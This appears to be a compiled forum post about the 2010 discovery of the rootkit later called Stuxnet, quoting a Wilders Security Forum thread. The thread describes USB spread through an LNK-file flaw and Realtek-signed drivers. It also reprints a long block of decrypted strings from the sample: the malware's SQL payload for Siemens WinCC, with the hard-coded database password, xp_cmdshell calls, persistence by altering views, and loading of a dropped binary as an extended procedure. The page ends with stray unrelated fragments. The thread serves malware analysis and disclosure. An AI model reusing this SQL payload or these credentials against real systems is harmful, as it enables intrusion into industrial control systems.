SCADA System’s Hard-Coded Password Circulated Online for Years
And let's include something from Wilders Security Forum:Rootkit.TmpHider
**************************************Excerpts************************************
July 12th, 2010, 09:18 AM
sergey ulasen
Modules of current malware were first time detected by "VirusBlokAda" (http://anti-virus.by/en/) company specialists on the 17th of June, 2010 and were added to the anti-virus bases as Trojan-Spy.0485 and Malware-Cryptor.Win32.Inject.gen.2. During the analysis of malware there was revealed that it uses USB storage device for propagation.
You should take into consideration that virus infects Operation System in unusual way through vulnerability in processing lnk-files (without usage of autorun.inf file).
So you just have to open infected USB storage device using Microsoft Explorer or any other file manager which can display icons (for i.e. Total Commander) to infect your Operating System and allow execution of the malware.
Malware installs two drivers: mrxnet.sys and mrxcls.sys. They are used to inject code into systems processes and hide malware itself. That's the reason why you can't see malware files on the infected USB storage device. We have added those drivers to anti-virus bases as Rootkit.TmpHider and SScope.Rookit.TmpHider.2. Note that both drivers are signed with digital signature of Realtek Semiconductor Corp. (www.realtek.com).
Thus, current malware should be added to very dangerous category causes the risk of the virus epidemic at the current moment.
After we have added a new recordes to the anti-virus bases we are admitting a lot of detections of Rootkit.TmpHider and SScope.Rookit.TmpHider.2 all over the world.
Source: http://anti-virus.by/en/tempo.shtml
**************************************************************snip************************************************
Now to a later post :
AV Expert
***************************EXCERPT*****************************
hi guys,
has anyone already taken a deeper look at the malware?
i found stuff like this after some decryption/unpacking stages of MD5 sample 016169ebebf1cec2aad6c7f0d0ee9026
**********************
SOFTWARE\Microsoft\MSSQLServer pdl GracS\ 2WSXcder WinCCConnect master .\WinCC sqloledb GracS\cc_tlg7.sav Step7\Example use [%s] declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where id=object_id(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';exec sp_msforeachdb @z'')' exec (@t) declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where id=object_id(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid set @e=charindex('--CC-SP',@t) if @e=0 begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from fail_in_order_to_return_false set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end close r deallocate r --*' exec (@t) use master select name from master..sysdatabases where filename like N'%s' exec master..sp_attach_db 'wincc_svr',N'%s',N'%s' exec master..sp_detach_db 'wincc_svr' use wincc_svr or SOFTWARE\SIEMENS\WinCC\Setup STEP7_Version SOFTWARE\SIEMENS\STEP7 SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation NTVDM TRACE .MCP .zip ~DT %s\WINCC DECLARE @vr varchar(256) SET @vr = CONVERT(varchar(256), (SELECT serverproperty('productversion') )) IF @vr > '9' BEGIN EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE EXEC sp_configure 'Ole Automation Procedures', 1 RECONFIGURE WITH OVERRIDE END DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @aods int, @adss int, @aip int, @abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @aods, 'Type', 1 IF @hr <> 0 GOTO endq EXEC @hr = sp_OAMethod @aods, 'Open', null IF @hr <> 0 GOTO endq SET @adss = ( SELECT DATALENGTH(abin) FROM sysbinlog ) SET @aip = 1 WHILE ( @aip <= @adss ) BEGIN SET @abf = ( SELECT SUBSTRING (abin, @aip, 4096 ) FROM sysbinlog ) EXEC @hr = sp_OAMethod @aods, 'Write', null, @abf IF @hr <> 0 GOTO endq SET @aip = @aip + 4096 END EXEC @hr = sp_OAMethod @aods, 'SaveToFile', null, @ainf, 2 IF @hr <> 0 GOTO endq EXEC sp_OAMethod @aods, 'Close', null endq: EXEC sp_dropextendedproc sp_dumpdbilog DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' EXEC sp_addextendedproc sp_dumpdbilog, @ainf EXEC sp_dumpdbilog EXEC sp_dropextendedproc sp_dumpdbilog endq: DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @fs int EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fs OUT IF @hr <> 0 GOTO endq EXECUTE sp_OAMethod @fs, 'DeleteFile', NULL, @ainf endq: DROP TABLE sysbinlog 0123456789ABCDEF CREATE TABLE sysbinlog ( abin image ) INSERT INTO sysbinlog VALUES(0x %SystemRoot%\system32\netapi32.dll %SystemRoot%\system32\kernel32.dll .xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_run,@t);exec master..sp_run;') view MCPVREADVARPERCON as select MCPTVARIABLEDESC.VARIABLEID,MCPTVARIABLEDESC.VARIABLETYPEID,MCPTVARIABLEDESC.FORMATFITTING,MCPTVARIABLEDESC.SCALEID,MCPTVARIABLEDESC.VARIABLENAME,MCPTVARIABLEDESC.ADDRESSPARAMETER,MCPTVARIABLEDESC.PROTOKOLL,MCPTVARIABLEDESC.MAXLIMIT,MCPTVARIABLEDESC.MINLIMIT,MCPTVARIABLEDESC.STARTVALUE,MCPTVARIABLEDESC.SUBSTVALUE,MCPTVARIABLEDESC.VARFLAGS,MCPTVARIABLEDESC.CONNECTIONID,MCPTVARIABLEDESC.VARPROPERTY,MCPTVARIABLEDESC.CYCLETIMEID,MCPTVARIABLEDESC.LASTCHANGE,MCPTVARIABLEDESC.ASDATASIZE,MCPTVARIABLEDESC.OSDATASIZE,MCPTVARIABLEDESC.VARGROUPID,MCPTVARIABLEDESC.VARXRES,MCPTVARIABLEDESC.VARMARK,MCPTVARIABLEDESC.SCALETYPE,MCPTVARIABLEDESC.SCALEPARAM1,MCPTVARIABLEDESC.SCALEPARAM2,MCPTVARIABLEDESC.SCALEPARAM3,MCPTVARIABLEDESC.SCALEPARAM4 from MCPTVARIABLEDESC ((SELECT top 1 1 FROM MCPVREADVARPERCON)='1') --CC-SP 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''--CC-S''''+char(80);if left(db_name(),2)=''''CC'''' select @t=substring(text,charindex(@s,text)+8,charindex(''''--*'''',text)-charindex(@s,text)-8) from syscomments where text like (''''%''''+@s+''''%'''');if @t is not NULL exec(@t)'';exec sp_msforeachdb @z')
*****************************************
this points me to the Siemens WinCC SCADA system. looks like this malware was made for espionage.
http://www.wilderssecurity.com/showpost.php?p=1712713&postcount=26
********************************EXCERPT************************************
Re: Rootkit.TmpHider
Is this vulnerability present in all Windows Operating Systems? I cannot get shortcut links to run automatically from a USB drive in Win2K or WinXP.
use of the word "Myrtus" -- which can be read as an allusion to Esther -- to name a file inside the code is one of several murky cluesTurn me on, dead man. ;')